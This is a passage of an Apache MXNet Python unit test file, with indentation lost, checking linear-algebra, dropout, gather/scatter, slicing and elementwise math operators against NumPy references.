lam, ut = np.linalg.eig(a)
ind = np.argsort(lam)
lam = lam[ind]
u = ut[:, ind].T
for i in range(0, a.shape[0]):
_syevd_forw_eigvec_sign(u[i])
return u, lam
def _syevd_forw_eigvec_sign(v):
ind = np.argmax(np.abs(v))
if v[ind] < 0.:
v[:] = -v
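# NumPy reference for the syevd backward pass. With G_U = grad_u, G_l = grad_l
# and A = U^T * diag(l) * U, the input gradient is
#   dA = U^T * (diag(G_l) + S) * U,
# where S is symmetric with zero diagonal and off-diagonal entries
#   S[i, j] = ((G_U U^T)[i, j] - (G_U U^T)[j, i]) / (2 * (l[i] - l[j])).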
def _syevd_backward(grad_u, grad_l, u, l):
n = l.size
assert grad_l.size == n
assert grad_u.shape == (n, n)
assert u.shape == (n, n)
temp = np.dot(grad_u, u.T)
temp2 = np.diag(grad_l)
for i in range(1, n):
for j in range(0, i):
denom = 2. * (l[i] - l[j])
elem = (temp[i, j] - temp[j, i])/denom
temp2[i, j] = elem
temp2[j, i] = elem
temp3 = np.dot(u.T, temp2)
return np.dot(temp3, u)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(1896893923)
def test_laop_3():
    # Currently disabled on GPU as syevd needs CUDA 8
    # while the MXNet builds use CUDA 7.5
if not (default_device() == mx.cpu()):
return
dtype = np.float64
rtol_fw = 1e-6
atol_fw = 1e-6
num_eps = 1e-4
rtol_bw = 1e-2
atol_bw = 1e-2
# enable numerical checking of gradients
grad_check = 1
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
rep_3x = lambda a, m, n :\
np.reshape(np.tile(np.array(a).flatten(), 3), (3, 1, m, n))
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol_fw, atol=atol_fw, dtype=dtype)
# Tests for linalg.syevd
test_syevd2 = _syevd_combined_symbol(data1) # Outputs (U U^T, U^T (diag L) U)
data1_s2 = _make_symm_symbol(data1, ndims=2)
test_syevd_u_2 = _syevd_first_output(data1_s2)
test_syevd_l_2 = _syevd_second_output(data1_s2)
data1_s4 = _make_symm_symbol(data1, ndims=4)
test_syevd_u_4 = _syevd_first_output(data1_s4)
test_syevd_l_4 = _syevd_second_output(data1_s4)
n_lst = [4, 1, 2, 10, 14]
for n in n_lst:
#print('\n** syevd: n={}'.format(n))
data_in1 = np.random.normal(0., 10., (n, n))
data_in1 = 0.5 * (data_in1 + data_in1.T)
res_eye = np.eye(n)
res_a = data_in1
check_fw(test_syevd2, [data_in1], [res_eye, res_a])
# Check backward
grad_u = np.random.normal(0., 2., (n, n))
grad_l = np.random.normal(0., 2., (n,))
bw_u, bw_l = _syevd_forward(data_in1)
grad_a = _syevd_backward(grad_u, grad_l, bw_u, bw_l)
check_bw(mx.sym.linalg.syevd(data1), [data_in1], [grad_u, grad_l], [grad_a])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_2, [data_in1])
# A => L
check_grad(test_syevd_l_2, [data_in1])
# Batch mode (3x the same thing)
a_batch = rep_3x(data_in1, n, n)
reye_batch = rep_3x(res_eye, n, n)
ra_batch = a_batch
check_fw(test_syevd2, [a_batch], [reye_batch, ra_batch])
if grad_check == 1:
# A => U
check_grad(test_syevd_u_4, [a_batch])
# A => L
check_grad(test_syevd_l_4, [a_batch])
# @piyushghai - Removing the fixed seed for this test.
# Issue for flakiness is tracked at - https://github.com/apache/incubator-mxnet/issues/11721
def test_laop_4():
    # Currently disabled on GPU as syevd needs CUDA 8
    # while the MXNet builds use CUDA 7.5
if not (default_device() == mx.cpu()):
return
rtol_fw = 1e-6
atol_fw = 1e-6
data1 = mx.symbol.Variable('data1')
check_fw = lambda sym, location, expected, dtype :\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
a_np = np.array([[1., 2.], [2., 4.]])
u_np = np.array([[0.89442718, -0.44721359], [0.44721359, 0.89442718]])
l_np = np.array([0., 5.])
test_syevd = mx.sym.linalg.syevd(data1)
# float64
#print('float64')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float64)
# float32
#print('float32')
check_fw(test_syevd, [a_np], [u_np, l_np], np.float32)
def test_laop_5():
# tests for diagonal and triangular matrix extraction and generation
data = mx.symbol.Variable('data')
# test complete range of small matrices to cover corner cases
for n in range(1, 5):
# test batched and non-batched processing
for b in range(3):
shape = (n, n) if b == 0 else (b, n, n)
data_in = np.random.uniform(1, 10, shape)
# test all legal offsets of the diagonal
for offs in range(1-n, n):
# test extraction of diagonal
test_diag = mx.sym.linalg.extractdiag(data, offset=offs)
res_diag = np.diagonal(data_in, offset=offs) if b==0 else np.diagonal(data_in, axis1=1, axis2=2, offset=offs)
check_symbolic_forward(test_diag, [data_in], [res_diag])
check_numeric_gradient(test_diag, [data_in])
# test generation of diagonal matrix
test_diag2 = mx.sym.linalg.makediag(data, offset=offs)
res_diag2 = None
if b == 0:
res_diag2 = np.diagflat(res_diag, k=offs)
else:
for i in range(b):
res = np.reshape(np.diagflat(res_diag[i], k=offs), (1, n, n))
res_diag2 = res if res_diag2 is None else np.concatenate((res_diag2, res), axis=0)
check_symbolic_forward(test_diag2, [res_diag], [res_diag2])
check_numeric_gradient(test_diag2, [res_diag])
# check both settings for parameter "lower" in case of zero offset
lower_vals = [True] if offs != 0 else [True, False]
for lower in lower_vals:
                # test triangle extraction by doing a full roundtrip, since the intermediate
                # extracted triangle uses a different element ordering than numpy's
test_trian = mx.sym.linalg.extracttrian(data, offset=offs, lower=lower)
test_trian = mx.sym.linalg.maketrian(test_trian, offset=offs, lower=lower)
extracts_lower = (offs < 0) or ((offs == 0) and lower)
res_trian = None
if b == 0:
res_trian = np.tril(data_in, offs) if extracts_lower else np.triu(data_in, offs)
else:
for i in range(b):
res = np.tril(data_in[i], offs) if extracts_lower else np.triu(data_in[i], offs)
res = np.reshape(res, (1, n, n))
res_trian = res if res_trian is None else np.concatenate((res_trian, res), axis=0)
check_symbolic_forward(test_trian, [data_in], [res_trian])
check_numeric_gradient(test_trian, [data_in])
# Tests for linalg.inverse
@pytest.mark.skip(reason="Test crashes https://github.com/apache/incubator-mxnet/issues/15975")
def test_laop_6():
dtype = np.float64
rtol_fw = 1e-7
atol_fw = 1e-9
num_eps = 1e-6
rtol_bw = 1e-4
atol_bw = 1e-6
data = mx.symbol.Variable('data')
check_fw = lambda sym, location, expected:\
check_symbolic_forward(sym, location, expected, rtol=rtol_fw,
atol=atol_fw, dtype=dtype)
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol_bw,
atol=atol_bw, dtype=dtype)
## det(I + dot(v, v.T)) = 1 + dot(v.T, v) >= 1, so it's always invertible;
## det is away from zero, so the value of logdet is stable
v = np.random.random(4)
a = np.eye(4) + np.outer(v, v)
a = np.tile(a, (3, 1, 1))
permute_mat = np.eye(4)[[1, 0, 2, 3]]
# test matrix inverse
r = np.eye(4)
r = np.tile(r, (3, 1, 1))
test_inverse = mx.sym.linalg.inverse(data)
test_eye = mx.sym.linalg.gemm2(data, test_inverse)
check_fw(test_eye, [a], [r])
check_grad(test_inverse, [a])
# test matrix determinant
# det
r = np.linalg.det(a)
test_det = mx.sym.linalg.det(data)
check_fw(test_det, [a], [r])
check_grad(test_det, [a])
# test slogdet
r1 = np.array([1., 1., 1.])
r2 = np.log(np.abs(np.linalg.det(a)))
test_sign, test_logabsdet = mx.sym.linalg.slogdet(data)
check_fw(test_sign, [a], [r1])
check_fw(test_sign, [np.dot(a, permute_mat)], [-r1])
check_fw(test_logabsdet, [a], [r2])
check_grad(test_logabsdet, [a])
def test_stack():
for _ in range(100):
ndim = random.randint(1, 5)
axis = random.randint(0, ndim)
if random.randint(0, 1):
axis = axis - ndim - 1
nin = random.randint(1, 3)
dshape = [random.randint(1, 5) for _ in range(ndim)]
inputs = [np.random.uniform(size=dshape) for _ in range(nin)]
output = np.stack(inputs, axis=axis)
sym_ins = [mx.sym.var('x%d'%i) for i in range(nin)]
out = mx.sym.stack(*sym_ins, axis=axis)
check_symbolic_forward(out, inputs, [output])
check_numeric_gradient(out, inputs)
@pytest.mark.flaky
def test_dropout():
def zero_count(array, ratio):
zeros = 0
for i in array:
if i == 0:
zeros += 1
elif math.isnan(i):
assert ratio == 1 # Only valid for ratio = 1
zeros += 1
return zeros
def check_correctness(executor, input, ratio):
input = input.ravel()
output = executor.outputs[0].asnumpy().ravel()
input_sum = np.sum(input)
output_sum = np.sum(output)
        # Make sure the input contains no zeros (test data setup check)
assert zero_count(input, ratio) == 0
# count number of zeroes in output
output_zeroes = zero_count(output, ratio)
        # The relative difference between input and output sums should stay below ratio/2
error = abs(output_sum - input_sum) / input_sum
if ratio == 1.0:
assert output_zeroes == len(input)
elif ratio > 0.2:
assert output_zeroes > 0
assert error < (ratio/2)
elif ratio == 0:
assert output_zeroes == 0
def check_dropout_ratio(ratio, shape, cudnn_off=True):
# test dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_device(), data=shape)
if ratio == 1:
max_value = float('nan')
else:
max_value = 1 if ratio == 0 else 1/ratio
if ratio == 1:
min_value = float('nan')
else:
min_value = 1 if ratio == 0 else 0
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
if not math.isnan(max_value):
assert exe.outputs[0].asnumpy().max() > 0
else:
assert math.isnan(exe.outputs[0].asnumpy().max())
if not math.isnan(min_value):
assert exe.outputs[0].asnumpy().min() == min_value
else:
assert math.isnan(exe.outputs[0].asnumpy().min())
check_correctness(exe, exe.arg_arrays[0].asnumpy(), ratio)
if ratio == 0.5:
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert (exe.outputs[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.arg_arrays[0].asnumpy()).all()
# test permanent dropout
x = mx.sym.var('data')
y = mx.sym.Dropout(x, p=ratio, mode='always', cudnn_off=cudnn_off)
exe = y._simple_bind(ctx=default_device(), data=shape)
exe.arg_arrays[0][:] = 1
exe.forward(is_train=True)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
exe.forward(is_train=False)
assert exe.outputs[0].asnumpy().max() == max_value
assert exe.outputs[0].asnumpy().min() == min_value
exe.backward([mx.nd.ones(shape)])
assert (exe.grad_arrays[0].asnumpy() == exe.outputs[0].asnumpy()).all()
def get_slice(x, axis, idx):
ix = ()
for i in range(x.ndim):
if i == axis:
ix += (idx,)
else:
ix += (slice(None, None, None),)
return x[ix]
def check_dropout_axes(ratio, shape, axes, cudnn_off=True):
compactshape = list(shape)
for axis in axes:
compactshape[axis] = 1
compactx = mx.random.uniform(shape=tuple(compactshape))
broadcastx = compactx.broadcast_to(shape)
dropouty = mx.nd.Dropout(broadcastx, p=ratio, axes=axes, cudnn_off=cudnn_off)
for axis in axes:
target = get_slice(dropouty, axis, 0).asnumpy()
for i in range(1, shape[axis]):
assert(get_slice(dropouty, axis, i).asnumpy() == target).all()
def check_passthrough(ratio, shape, cudnn_off=True):
# test inference_mode forward and then backward
a = mx.random.uniform(shape=shape)
a.attach_grad()
with mx.autograd.record(train_mode=False):
b = mx.nd.Dropout(a, ratio, cudnn_off=cudnn_off) # dropout acts as identity
b.backward()
assert_almost_equal(a.grad.asnumpy(), mx.nd.ones_like(b).asnumpy())
shape = (100, 100)
check_dropout_ratio(0.5, shape)
check_dropout_ratio(0.0, shape)
check_dropout_ratio(1.0, shape)
check_dropout_ratio(0.75, shape)
check_dropout_ratio(0.25, shape)
check_dropout_ratio(0.5, shape, cudnn_off=False)
check_dropout_ratio(0.0, shape, cudnn_off=False)
check_dropout_ratio(1.0, shape, cudnn_off=False)
check_dropout_ratio(0.75, shape, cudnn_off=False)
check_dropout_ratio(0.25, shape, cudnn_off=False)
check_passthrough(0.5, shape)
check_passthrough(0.0, shape)
check_passthrough(1.0, shape)
check_passthrough(0.5, shape, cudnn_off=False)
check_passthrough(0.0, shape, cudnn_off=False)
check_passthrough(1.0, shape, cudnn_off=False)
nshape = (10, 10, 10, 10)
with mx.autograd.train_mode():
check_dropout_axes(0.25, nshape, axes = (0,))
check_dropout_axes(0.25, nshape, axes = (1,))
check_dropout_axes(0.25, nshape, axes = (2,))
check_dropout_axes(0.25, nshape, axes = (3,))
check_dropout_axes(0.25, nshape, axes = (0, 1))
check_dropout_axes(0.25, nshape, axes = (0, 2))
check_dropout_axes(0.25, nshape, axes = (0, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2))
check_dropout_axes(0.25, nshape, axes = (1, 3))
check_dropout_axes(0.25, nshape, axes = (2, 3))
check_dropout_axes(0.25, nshape, axes = (0, 1, 2))
check_dropout_axes(0.25, nshape, axes = (0, 2, 3))
check_dropout_axes(0.25, nshape, axes = (1, 2, 3))
check_dropout_axes(0.25, nshape, axes = (0,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (3,), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 1, 2), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (0, 2, 3), cudnn_off=False)
check_dropout_axes(0.25, nshape, axes = (1, 2, 3), cudnn_off=False)
@pytest.mark.skip(reason="test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/11290")
def test_scatter_gather_nd():
def check(data, idx):
data.attach_grad()
with mx.autograd.record():
y = mx.nd.gather_nd(data, idx)
y.backward(y)
npidx = tuple(i.asnumpy() for i in idx)
assert (data.asnumpy()[npidx] == y.asnumpy()).all()
npdata = np.zeros_like(data.asnumpy())
npdata[npidx] = y.asnumpy()
assert (npdata == data.grad.asnumpy()).all()
assert (mx.nd._internal._backward_gather_nd(y, idx, shape=data.shape).asnumpy() == data.grad.asnumpy()).all()
for dtype in ['int32', 'int64', 'float16', 'float32', 'float64']:
data = mx.nd.arange(360, dtype=dtype).reshape((3,4,5,6))
idx = mx.nd.array([[1,1,2], [3, 3, 0], [3,2,1]], dtype='int32')
check(data, idx)
idx = mx.nd.array([[1,1,2], [3,3,0], [3,2,1], [5,2,4]], dtype='int32')
check(data, idx)
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [0, 1, 0]], dtype='int32')
assert (mx.nd.scatter_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [2, 3]]).all()
data = mx.nd.array([2, 3, 0], dtype=dtype)
idx = mx.nd.array([[1, 1, 0], [1, 1, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(2, 2)).asnumpy() == [[0, 0], [0, 5]]).all()
data_npy = np.random.randint(0, 10, (100,))
data = mx.nd.array(data_npy, dtype=dtype)
idx = mx.nd.zeros(shape=(1, 100), dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data_npy.sum())
if dtype == 'int64':
data = mx.nd.array([2123162361283621, -31231236374787,
-112372937128970, -1378278798172378], dtype=dtype)
idx = mx.nd.array([[0, 0, 0, 0]], dtype='int32')
assert (mx.nd._internal._backward_gather_nd(data, idx, shape=(1,)).asscalar() == data.asnumpy().sum())
def test_gather_nd_check_bound():
def _test_gather_nd_exception(data, indices):
output = mx.nd.gather_nd(data, indices).asnumpy()
    # check that out-of-bound indices raise an error
data = mx.nd.array([[0, 1, 2], [3, 4, 5]])
indices1 = mx.nd.array([[0, 1, 0], [0, 1, 3]])
indices2 = mx.nd.array([[0, 1, 0], [0, 1, -5]])
assertRaises(IndexError, _test_gather_nd_exception, data, indices1)
# IndexError: index 3 is out of bounds for axis 1 with size 3
assertRaises(IndexError, _test_gather_nd_exception, data, indices2)
# IndexError: index -5 is out of bounds for axis 1 with size 3
# check if the negative indices are wrapped correctly
indices1 = mx.nd.array([[0, 1, -1], [0, 1, -2]])
indices2 = mx.nd.array([[0, 1, 1], [0, 1, 1]])
data1 = mx.nd.gather_nd(data, indices1)
data2 = mx.nd.gather_nd(data, indices2)
assert_almost_equal(data1, data2, rtol=1e-5, atol=1e-5)
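# Compares forward and backward of a single unary operator against the given
# NumPy reference functions for one dtype. The operator output is wrapped in
# broadcast_add(op(x), zeros_like(x)), which gives the composite symbol a
# descriptive name without changing its values.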
def compare_forw_backw_unary_op(
name, forward_mxnet_call, forward_numpy_call,
backward_numpy_call, shape, input_low, input_high, rtol, atol,
dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
data = mx.symbol.Variable(op_name + '_data', dtype=dtype)
# Comparison: Forward expression
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
res_np = forward_numpy_call(data_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_fw(op_ex, [data_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data_grad = backward_numpy_call(data_np) * res_grad
check_bw(op_ex, [data_np], [res_grad], [data_grad])
def finite_diff_unary_op(
name, forward_mxnet_call, shape, input_low, input_high, rtol, atol,
num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data_np = np.random.uniform(input_low, input_high, shape).astype(dtype)
data = mx.symbol.Variable('data', dtype=dtype)
op_name = 'unary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data), mx.sym.zeros_like(data),
name=op_name)
check_grad(op_ex, [data_np])
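# NumPy reference for smooth_l1 and its derivative:
#   f(x)  = 0.5 * (sigma * x)^2   if |x| < 1 / sigma^2, else |x| - 0.5 / sigma^2
#   f'(x) = x * sigma^2           if |x| < 1 / sigma^2, else sign(x)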
def np_smooth_l1(x, sigma):
issq = 1. / sigma / sigma
absx = np.abs(x)
temp = x * sigma
return np.where(absx < issq, 0.5 * (temp ** 2), absx - 0.5 * issq)
def np_smooth_l1_grad(x, sigma):
ssq = sigma * sigma
return np.where(np.abs(x) < 1. / ssq, x * ssq, np.sign(x))
# Tests for unary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
# Seed set because the test is not robust enough to operate on random data
@pytest.mark.seed(192837465)
def test_unary_math_operators():
have_scipy = True
try:
from scipy import special as scipy_special
except:
print("Could not import scipy. Skipping unit tests for special functions")
have_scipy = False
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
rtol_less_l = [1e-6, 1e-5, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
atol_less_l = [1e-6, 1e-5, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'arccos' : [lambda x: mx.sym.arccos(x),
lambda x: np.arccos(x),
lambda x: -1. / np.sqrt(1. - x ** 2.),
-0.95, 0.95],
'arccosh': [lambda x: mx.sym.arccosh(x),
lambda x: np.arccosh(x),
lambda x: 1. / np.sqrt(x ** 2 - 1.),
1.05, 10.0],
'arcsin': [lambda x: mx.sym.arcsin(x),
lambda x: np.arcsin(x),
lambda x: 1. / np.sqrt(1. - x ** 2),
-0.95, 0.95],
'arcsinh': [lambda x: mx.sym.arcsinh(x),
lambda x: np.arcsinh(x),
lambda x: 1. / np.sqrt(x**2 + 1.),
-5.0, 5.0],
'arctan': [lambda x: mx.sym.arctan(x),
lambda x: np.arctan(x),
lambda x: 1. / (x ** 2. + 1.),
-5.0, 5.0],
'arctanh': [lambda x: mx.sym.arctanh(x),
lambda x: np.arctanh(x),
lambda x: 1. / (1. - x ** 2),
-0.95, 0.95],
'cbrt': [lambda x: mx.sym.cbrt(x),
lambda x: np.cbrt(x),
lambda x: 1. / (3. * np.cbrt(x) ** 2),
-10.0, 10.0],
'cos': [lambda x: mx.sym.cos(x),
lambda x: np.cos(x),
lambda x: -np.sin(x),
-5.0, 5.0],
'cosh': [lambda x: mx.sym.cosh(x),
lambda x: np.cosh(x),
lambda x: np.sinh(x),
-2.0, 2.0],
'exp': [lambda x: mx.sym.exp(x),
lambda x: np.exp(x),
lambda x: np.exp(x),
-4.0, 4.0],
'expm1': [lambda x: mx.sym.expm1(x),
lambda x: np.expm1(x),
lambda x: np.exp(x),
-0.1, 0.1],
'log': [lambda x: mx.sym.log(x),
lambda x: np.log(x),
lambda x: 1. / x,
0.01, 100.0],
'log10': [lambda x: mx.sym.log10(x),
lambda x: np.log10(x),
lambda x: 1. / (x * np.log(10.)),
0.01, 100.0],
'log2': [lambda x: mx.sym.log2(x),
lambda x: np.log2(x),
lambda x: 1. / (x * np.log(2.)),
0.01, 100.0],
'log1p': [lambda x: mx.sym.log1p(x),
lambda x: np.log1p(x),
lambda x: 1. / (1. + x),
-0.1, 0.1],
'rcbrt': [lambda x: mx.sym.rcbrt(x),
lambda x: 1. / np.cbrt(x),
lambda x: -1. / (3. * x * np.cbrt(x)),
0.01, 100.0],
'reciprocal': [lambda x: mx.sym.reciprocal(x),
lambda x: 1. / x,
lambda x: -1. / (x ** 2),
0.01, 100.0],
'relu': [lambda x: mx.sym.relu(x),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'rsqrt': [lambda x: mx.sym.rsqrt(x),
lambda x: 1. / np.sqrt(x),
lambda x: -0.5 / (x * np.sqrt(x)),
0.01, 100.0],
'sigmoid': [lambda x: mx.sym.sigmoid(x),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'softsign': [lambda x: mx.sym.softsign(x),
lambda x: x / (1. + np.abs(x)),
lambda x: 1. / np.square(1. + np.abs(x)),
-3.0, 3.0],
'sin': [lambda x: mx.sym.sin(x),
lambda x: np.sin(x),
lambda x: np.cos(x),
-5.0, 5.0],
'sinh': [lambda x: mx.sym.sinh(x),
lambda x: np.sinh(x),
lambda x: np.cosh(x),
-2.0, 2.0],
'sqrt': [lambda x: mx.sym.sqrt(x),
lambda x: np.sqrt(x),
lambda x: 0.5 / np.sqrt(x),
0.01, 100.0],
'tan': [lambda x: mx.sym.tan(x),
lambda x: np.tan(x),
lambda x: np.tan(x) ** 2 + 1.,
-1.5, 1.5],
'tanh': [lambda x: mx.sym.tanh(x),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'smooth_l1_sig1': [lambda x: mx.sym.smooth_l1(x, scalar=1.),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig_default': [lambda x: mx.sym.smooth_l1(x),
lambda x: np_smooth_l1(x, 1.),
lambda x: np_smooth_l1_grad(x, 1.),
-2.0, 2.0],
'smooth_l1_sig2': [lambda x: mx.sym.smooth_l1(x, scalar=2.),
lambda x: np_smooth_l1(x, 2.),
lambda x: np_smooth_l1_grad(x, 2.),
-1.0, 1.0]
}
if have_scipy:
unary_ops['gamma'] = [lambda x: mx.sym.gamma(x),
lambda x: scipy_special.gamma(x),
lambda x: scipy_special.gamma(x) * scipy_special.psi(x),
0.01, 5.0]
unary_ops['gammaln'] = [lambda x: mx.sym.gammaln(x),
lambda x: scipy_special.gammaln(x),
lambda x: scipy_special.psi(x),
0.01, 20.0]
# Loop over operators
for name, op in unary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
if name == 'gammaln' or name == 'gamma':
rtol = rtol_less_l[ind]
atol = atol_less_l[ind]
else:
rtol = rtol_l[ind]
atol = atol_l[ind]
compare_forw_backw_unary_op(
name, op[0], op[1], op[2], shape, op[3], op[4], rtol, atol,
dtype)
# Finite difference testing
finite_diff_unary_op(
name, op[0], shape, op[3], op[4], rtol_fd, atol_fd, num_eps)
def compare_forw_backw_binary_op(
name, forward_mxnet_call, forward_numpy_call,
backward1_numpy_call, backward2_numpy_call, shape, input1_low,
input1_high, input2_low, input2_high, rtol, atol, dtype=np.float32):
check_fw = lambda sym, location, expected :\
check_symbolic_forward(sym, location, expected, rtol=rtol,
atol=atol, dtype=dtype)
check_bw = lambda sym, location, out_grads, expected :\
check_symbolic_backward(sym, location, out_grads, expected,
rtol=rtol, atol=atol, dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
data1 = mx.symbol.Variable(op_name + '_data1', dtype=dtype)
data2 = mx.symbol.Variable(op_name + '_data2', dtype=dtype)
# Comparison: Forward expression
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
res_np = forward_numpy_call(data1_np, data2_np)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_fw(op_ex, [data1_np, data2_np], [res_np])
# Comparison: Backward expression
res_grad = np.random.uniform(-2.0, 2.0, shape).astype(dtype)
data1_grad = backward1_numpy_call(data1_np, data2_np) * res_grad
data2_grad = backward2_numpy_call(data1_np, data2_np) * res_grad
check_bw(op_ex, [data1_np, data2_np], [res_grad], [data1_grad, data2_grad])
def finite_diff_binary_op(
name, forward_mxnet_call, shape, input1_low, input1_high, input2_low,
input2_high, rtol, atol, num_eps):
# Finite difference tests are done in float64
dtype = np.float64
check_grad = lambda sym, location:\
check_numeric_gradient(sym, location, numeric_eps=num_eps, rtol=rtol,
atol=atol, dtype=dtype)
data1_np = np.random.uniform(input1_low, input1_high, shape).astype(dtype)
data2_np = np.random.uniform(input2_low, input2_high, shape).astype(dtype)
data1 = mx.symbol.Variable('data1', dtype=dtype)
data2 = mx.symbol.Variable('data2', dtype=dtype)
op_name = 'binary_op={}, dtype={}'.format(name, dtype)
op_ex = mx.sym.broadcast_add(
forward_mxnet_call(data1, data2), mx.sym.zeros_like(data1),
name=op_name)
check_grad(op_ex, [data1_np, data2_np])
# Tests for binary operators (basic mathematical functions):
# - Forward: Comparison to NumPy (several dtype)
# - Backward: Comparison to NumPy (several dtype)
# - Finite difference tests (only dtype = float64)
def test_binary_math_operators():
shape=(9, 10)
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
binary_ops = {
'hypot' : [lambda x, y: mx.sym.hypot(x, y),
lambda x, y: np.hypot(x, y),
lambda x, y: x / np.hypot(x, y),
lambda x, y: y / np.hypot(x, y),
-5.0, 5.0, -5.0, 5.0],
'pow': [lambda x, y: mx.sym.pow(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0],
'power': [lambda x, y: mx.sym.power(x, y),
lambda x, y: np.power(x, y),
lambda x, y: np.power(x, y - 1.) * y,
lambda x, y: np.power(x, y) * np.log(x),
0.2, 5.0, -4.0, 4.0]
}
# Loop over operators
for name, op in binary_ops.items():
# Loop over dtype's
for ind in range(len(dtype_l)):
dtype = dtype_l[ind]
compare_forw_backw_binary_op(
name, op[0], op[1], op[2], op[3], shape, op[4], op[5], op[6],
op[7], rtol_l[ind], atol_l[ind], dtype)
# Finite difference testing
finite_diff_binary_op(
name, op[0], shape, op[4], op[5], op[6], op[7], rtol_fd, atol_fd,
num_eps)
@pytest.mark.serial
def test_slice():
def test_slice_forward_backward(a, index):
a_np = a.asnumpy()
begin = []
end = []
step = []
for slice_i in index:
begin.append(slice_i.start)
end.append(slice_i.stop)
step.append(slice_i.step)
b = mx.nd.slice(a, begin=begin, end=end, step=step)
b_np = a_np[index]
assert same(b.asnumpy(), b_np)
data = mx.sym.Variable('data')
slice_sym = mx.sym.slice(data, begin=begin, end=end, step=step)
expected_in_grad = np.zeros_like(a_np)
expected_in_grad[index] = b_np
check_symbolic_backward(slice_sym, [a_np], [b_np], [expected_in_grad])
shape = (16, 14, 17, 20)
arr = mx.nd.arange(np.prod(shape)).reshape(shape=shape)
index_list = [(slice(None),), (slice(None), slice(None)), (slice(1, 10),), (slice(1, 10), slice(3, 9)),
(slice(1, 10), slice(2, 5), slice(3, 6), slice(7, 10)),
(slice(1, 10, 2), slice(2, 9, 3), slice(3, 6, 5), slice(7, 10, 2)),
